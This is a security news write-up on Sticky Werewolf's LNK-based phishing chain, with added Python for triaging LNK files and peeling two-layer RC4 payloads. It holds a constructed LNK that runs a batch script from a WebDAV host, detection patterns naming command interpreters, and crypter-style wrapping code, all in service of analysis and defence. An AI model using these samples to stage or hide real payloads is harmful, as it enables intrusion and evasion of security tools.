Sticky Werewolf Weaponizes LNK Files to Attack Organizations

Sticky Werewolf, a cyber threat group, has shifted its delivery method from phishing emails carrying download links to malicious files to archive attachments containing LNK files, which act as shortcuts to malicious executables hosted on WebDAV servers.

When a user opens the LNK, a batch script runs and in turn launches an AutoIt script that delivers the final payload. The chain no longer depends on the victim following a link to a file-sharing site: the malware is staged as soon as the LNK file is executed.

Infection Chain

The cyberespionage group Sticky Werewolf is targeting the aviation industry with phishing emails disguised as business invitations from a legitimate Russian aerospace company, AO OKB Kristall. The emails carry an archive attachment containing two malicious LNK files masquerading as DOCX documents and a decoy PDF file.


Clicking either LNK file triggers a batch script that launches an AutoIt script to deliver the final payload, a significant shift from Sticky Werewolf's previous tactic of using links to download malware directly from file-sharing platforms.

Phishing Email

A phishing email with a decoy PDF attachment targets enterprises related to Russian helicopters; the PDF mentions a video conference and refers to the two malicious LNK files as meeting documents.

Clicking an LNK runs a malicious executable from a network share. That executable is an NSIS self-extracting archive, a variant of the CypherIT crypter.

The extracted files land in the Internet Explorer temporary files directory, and a batch script is then executed.

PDF

Two malicious LNK files disguised as Word documents target users. Clicking either LNK triggers the same sequence: first, the LNK adds a registry entry so that a compromised WINWORD.exe runs persistently at login.

It then displays a decoy error message to distract the user. The first LNK additionally copies a potentially deceptive image file; the second LNK behaves the same way and launches the malicious WINWORD.exe.
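The LNK files described above share a few structural traits worth triaging automatically: the link target is a command interpreter rather than a document, the arguments reference a UNC or WebDAV path, the icon is borrowed from Word, and the window is opened minimised. The following Python is an added example (not code from the article or from the cited research) that parses the ShellLink header and StringData fields of a .lnk file and flags those traits. The sample LNKs are constructed in the script for testing, the IP 203.0.113.10 is a documentation address, and the path and file names are invented; the parser skips the IDList and LinkInfo blocks rather than decoding them.

```python
import re
import struct

# ShellLink header constants from MS-SHLLINK (the LNK format the campaign abuses).
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # window opens minimised: a common trick to hide the console


def parse_lnk(data: bytes) -> dict:
    """Extract ShowCommand and the StringData fields from a .lnk file."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a ShellLink header")
    if data[4:20] != LNK_CLSID:
        raise ValueError("bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    info = {"flags": flags, "show_command": struct.unpack_from("<I", data, 60)[0]}
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:  # skip the IDList (2-byte size prefix, not counted)
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:            # skip LinkInfo (its size field includes itself)
        off += struct.unpack_from("<I", data, off)[0]

    def read_string(pos: int):
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, not bytes
        pos += 2
        if flags & IS_UNICODE:
            return data[pos:pos + 2 * count].decode("utf-16-le"), pos + 2 * count
        return data[pos:pos + count].decode("cp1252", "replace"), pos + count

    for flag, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                       (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                       (HAS_ICON_LOCATION, "icon_location")):
        if flags & flag:
            info[name], off = read_string(off)
    return info


# Heuristics for the tradecraft described in the article; tune them for your environment.
RULES = [
    (re.compile(r"\\\\[\w.\-]+(?:@ssl)?(?:@\d+)?\\", re.I), "UNC path in target or arguments"),
    (re.compile(r"@ssl|davwwwroot", re.I), "WebDAV-style share reference"),
    (re.compile(r"\b(?:cmd|powershell|pwsh|wscript|cscript|mshta|rundll32|regsvr32)(?:\.exe)?\b", re.I),
     "command interpreter or LOLBin as link target"),
    (re.compile(r"\.(?:bat|cmd|vbs|js|hta|ps1)\b", re.I), "script file referenced"),
]


def triage_lnk(data: bytes) -> list[str]:
    """Return the suspicious traits found in an LNK (empty list means nothing was flagged)."""
    info = parse_lnk(data)
    text = " ".join(info.get(k, "") for k in ("relative_path", "working_dir", "arguments"))
    findings = [label for rx, label in RULES if rx.search(text)]
    icon = info.get("icon_location", "")
    if re.search(r"winword|\.docx?\b", icon, re.I) and re.search(r"cmd|powershell|\.bat", text, re.I):
        findings.append("Office icon on a command-interpreter target (icon spoofing)")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window opens minimised (SW_SHOWMINNOACTIVE)")
    return findings


def build_lnk(relative_path: str, arguments: str, icon_location: str, show_command: int = 1) -> bytes:
    """Build a minimal Unicode LNK (header + StringData only, no IDList/LinkInfo) for testing."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def enc(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + enc(relative_path) + enc(arguments) + enc(icon_location)


# Constructed samples (not real campaign artefacts); 203.0.113.10 is a documentation address.
MALICIOUS_LNK = build_lnk(
    r"..\..\..\Windows\System32\cmd.exe",
    r'/c "\\203.0.113.10@SSL\DavWWWRoot\invitation\meeting_agenda.docx.bat"',
    r"%ProgramFiles%\Microsoft Office\root\Office16\WINWORD.EXE",
    show_command=SW_SHOWMINNOACTIVE,
)
BENIGN_LNK = build_lnk(
    r"..\..\..\Windows\System32\notepad.exe",
    r"C:\Users\Public\notes.txt",
    r"%SystemRoot%\System32\notepad.exe",
)

if __name__ == "__main__":
    for name, blob in (("malicious", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        print(name, parse_lnk(blob)["relative_path"], triage_lnk(blob))
```

Run it over an extracted archive with `triage_lnk(open(path, "rb").read())`; anything that returns more than one finding, or a file whose name ends in `.docx.lnk`, deserves a sandbox run before a user ever double-clicks it.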

Batch Script

A batch script within the LNK delays execution if specific antivirus processes are running and potentially renames files to evade detection.

Finally, the script combines a legitimate AutoIt executable with a malicious script and executes them. 

Processes monitored by the Batch script and their corresponding security vendors.

This malicious AutoIt script aims to evade detection, establish persistence, and check for signatures of security environments and debuggers. It loads a clean copy of ntdll.dll to bypass the user-mode hooks placed by security products, effectively unhooking their monitoring.

Persistence is achieved through scheduled tasks or startup directory modifications. The payload, hidden within the script, is decrypted using a two-stage RC4 process keyed with a user-defined passphrase.

According to Morphisec, the decrypted and decompressed payload is injected via process hollowing into a legitimate AutoIt process, which makes it harder to detect.
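The two-stage RC4 decryption and decompression described above is the part of the chain an analyst most often has to reproduce to get at the injected executable. The following Python is an added example, not code from the article or from Morphisec, and the blob layout it uses is an assumption for illustration: the outer RC4 layer, keyed with the passphrase, covers a 16-byte inner key followed by the inner ciphertext; the inner RC4 layer, keyed with that inner key, covers a zlib-compressed payload. The real crypter's layout, key length and compression are not given on the page and may differ. The stand-in payload is constructed, and the passphrase is invented.

```python
import os
import zlib
from typing import Optional


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


INNER_KEY_LEN = 16  # assumed layout: first 16 bytes under the outer layer are the inner key


def wrap_payload(passphrase: bytes, payload: bytes) -> bytes:
    """Crypter side (assumed layout): compress, RC4 with a random inner key, then RC4 the
    inner key plus inner ciphertext with the user passphrase."""
    inner_key = os.urandom(INNER_KEY_LEN)
    stage2 = rc4(inner_key, zlib.compress(payload))
    return rc4(passphrase, inner_key + stage2)


def unwrap_payload(passphrase: bytes, blob: bytes) -> bytes:
    """Analyst side: peel the two RC4 layers, then inflate the payload."""
    layer = rc4(passphrase, blob)
    inner_key, stage2 = layer[:INNER_KEY_LEN], layer[INNER_KEY_LEN:]
    return zlib.decompress(rc4(inner_key, stage2))


def recover_passphrase(blob: bytes, candidates: list[bytes]) -> Optional[bytes]:
    """Try candidate passphrases (for example strings pulled from the decompiled AutoIt script).
    Only the right one yields a valid zlib stream that inflates to a PE image."""
    for cand in candidates:
        try:
            if unwrap_payload(cand, blob).startswith(b"MZ"):
                return cand
        except zlib.error:                    # wrong key gives garbage, so inflate fails
            continue
    return None


# Constructed stand-in for the injected executable (not a real sample).
FAKE_PE = b"MZ" + b"\x90" * 64 + b"This program cannot be run in DOS mode.\r\n" * 4

if __name__ == "__main__":
    blob = wrap_payload(b"example-passphrase", FAKE_PE)
    print("recovered:", recover_passphrase(blob, [b"wrong", b"example-passphrase"]))
    print("payload starts with:", unwrap_payload(b"example-passphrase", blob)[:2])
```

The failure mode is the useful part: a wrong passphrase does not produce an obviously wrong result at the RC4 stage, because RC4 output is always the same length as its input, so the validity check has to come from the decompressor and from the `MZ` header of the recovered image.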


Aman Mishra
